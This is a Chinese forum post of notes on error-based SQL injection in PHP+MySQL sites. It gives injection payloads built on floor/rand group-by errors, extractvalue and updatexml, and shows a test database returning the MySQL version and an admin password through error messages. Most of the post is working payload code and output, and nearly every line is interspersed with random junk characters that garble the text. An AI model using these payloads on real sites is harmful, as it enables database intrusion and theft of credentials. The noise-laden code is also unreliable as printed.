放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。4 {9 ~1 C5 X; M3 p* ^
实际测试环境:
) R0 o4 o8 U% H5 f1 X. c u! s; H% Q: G8 z( B# F. P
6 k6 R* \. v7 o) v5 A: U1 t, e/ D
mysql> show tables;/ F4 z: d; ?: B
+----------------+0 Y8 T8 T, w% U! o" A
| Tables_in_test |/ b% a. J+ k8 g. I; ~2 V
+----------------+! _5 P& w( t! \: @0 u3 S
| admin |. i: r$ H! P' Z& g& f3 G
| article |
" m+ E; F3 j- T. u' y3 L# z+ T+----------------+
5 |- I+ h- S7 ~) P5 E: f+ K* P
8 Q* B, O1 r: A8 Y3 n& |3 K4 D( Z 9 n8 f! @0 l* X2 S7 j4 u/ y" z& h' d
6 Q; }) x$ }2 g0 E! N% i
mysql> describe admin; s. z) }* g( ]# O/ C3 R
+-------+------------------+------+-----+---------+----------------+
/ B% g2 O+ I- C0 U5 z| Field | Type | Null | Key | Default | Extra |6 [3 V. P1 H2 O `7 l2 E5 j
+-------+------------------+------+-----+---------+----------------+$ f% U2 H$ O( `4 R( k. v- q6 T
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |& L) S4 C1 n1 V! m1 I
| user | varchar(50) | NO | | NULL | |( P7 {+ D$ X' S' z3 M+ Z
| pass | varchar(50) | NO | | NULL | |
h4 H1 g& S6 T8 Y4 S/ g+-------+------------------+------+-----+---------+----------------+
$ T: V3 @" O F& y) b5 K
: G8 A' h" s0 P. e* [2 G
) F0 R% r% h/ D1 _/ S5 M) k 8 d& d# v% u1 I5 V4 ]" g
mysql> describe article;
; o3 ]7 A$ u% ?: G0 s/ r! z; [9 W+---------+------------------+------+-----+---------+----------------+
+ G' H1 `" p O% u c6 j$ R| Field | Type | Null | Key | Default | Extra |0 F" Q5 D) ~6 Q& n
+---------+------------------+------+-----+---------+----------------+7 U8 h& D6 W6 F& R) _5 p5 d' Y
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
: {+ j' S# h4 N4 _1 h0 h8 y| title | varchar(50) | NO | | NULL | |
+ A5 l. ^+ Y+ J* v) r| content | varchar(50) | NO | | NULL | |
9 b$ M/ w& B' T. e" u* C& x+---------+------------------+------+-----+---------+----------------+% u; {3 ]) ^) w1 \3 Z
1、通过floor报错( c8 N$ Y* \7 @# p$ U
可以通过如下一些利用代码5 O0 M* ]; S P8 }/ z6 L
; ]$ F2 T3 X; k( R e2 \ }
- l( j& }& c4 N8 ]3 J, z
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
4 u/ _5 @ \! V: U9 Vfrom information_schema.tables group by x)a);- _* X2 q0 v% ^# }
$ W" Q1 W L1 B/ W$ h
4 ^5 V2 e, g" W4 gand (select count(*) from (select 1 union select null union select !1)x, ?/ m9 k0 Y; D/ w
group by concat((select table_name from information_schema.tables limit 1),
$ Z8 c# L2 _3 a) ?floor(rand(0)*2)));
, P( h, O) j1 E举例如下:
& V+ x0 N4 t5 D( Y首先进行正常查询:: R) b: _$ [1 ]/ o) g6 Y9 S
) r' c" G. g6 a& f- t ymysql> select * from article where id = 1;6 ^5 q7 q) c' G
+----+-------+---------+9 u5 O9 L: ]- K1 c3 b9 Z0 T
| id | title | content | g! I0 x+ k! w0 \
+----+-------+---------+
& c3 [* p E2 D; [) P# b `( || 1 | test | do it |9 j# p( N6 l0 e
+----+-------+---------+8 E3 e. p- P( K. s
假如id输入存在注入的话,可以通过如下语句进行报错。. x# B* [1 R1 h! E' q6 a& V
' o& U% b4 P* w1 R* L
3 Y9 d( v& ]* j) u- c4 s8 j/ amysql> select * from article where id = 1 and (select 1 from b0 C/ [0 p% W" ?
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);1 g1 t9 M) @/ |
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'4 s: e. v$ _% H# ]# L, D
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
/ I& z- s0 I3 L: c9 _例如我们需要查询管理员用户名和密码:
6 n& b7 e, _( WMethod1:
- B+ d; H" p4 W; _0 n7 \% W
% F$ [# R7 O- K! N
5 l5 a3 E1 A. l& R$ ~% |mysql> select * from article where id = 1 and (select 1 from
9 R8 o/ @ a8 E8 q& }' G(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
7 {$ ^2 R3 R: X! E& Ffrom information_schema.tables group by x)a);
- k7 n# q/ b+ ?& r- ] o' z/ i2 b3 k' RERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'" d5 N8 E( Y) Y0 ?. m
Method2:0 E- n/ Q. o2 t4 j( S, m5 l
# Z1 K }& c+ }" {& n! ]' M0 Y4 ^ # p: c' R0 O- y2 b, J
mysql> select * from article where id = 1 and (select count(*)
) `" \2 c5 k/ X+ H, ffrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
" g+ a- r; O, Gfloor(rand(0)*2)));* e( ~8 ^& d0 ^2 Z) k# p! h( ^% Q7 M
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'+ T! a/ m1 ~/ a5 P# b O
2、ExtractValue
' z( u$ M4 d" w }测试语句如下
7 Z4 ]' R0 M$ ]0 J3 Z
3 t+ g9 ^3 D, @: K. Z
1 Q! z# n: o* O5 u/ wand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
8 \) d! s7 W' F9 F实际测试过程. z- [ {& f" a$ p' `/ z
% `( ^9 w; d5 A# M+ s
% q; S$ x/ ], g3 O+ V0 _
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
$ k- B- ?+ e7 X0 C e* m# |' d: h(select pass from admin limit 1)));--) n, c b! E# Z( m
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
2 M9 S" L- B! z, r, C3、UpdateXml" N' |4 |/ W% q. n4 z, g) x& B$ m
测试语句
& ~4 H/ T D3 T 3 F ^1 g- y1 G. K4 r' O6 \ k
+ V {4 B; T6 m
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
) q- q1 J" Q* e8 U实际测试过程. N _' r5 m2 r5 B9 J
" v, y- q/ R9 c$ k0 H0 p/ [
# u U8 S+ h' \# Jmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
; O1 ?5 i# J5 f+ H4 t* A(select pass from admin limit 1),0x5e24),1));
( s8 g: s' S9 a! F; H, pERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'. ^% R, T+ e( V3 _
All, thanks foreign guys.2 T- C: d/ P4 Q0 c e6 {7 b
0 W- W# T! R+ H; J2 N, i6 s* R" j9 G+ k0 v: m
|
发表于 2012-12-10 10:28:51
收藏
支持
反对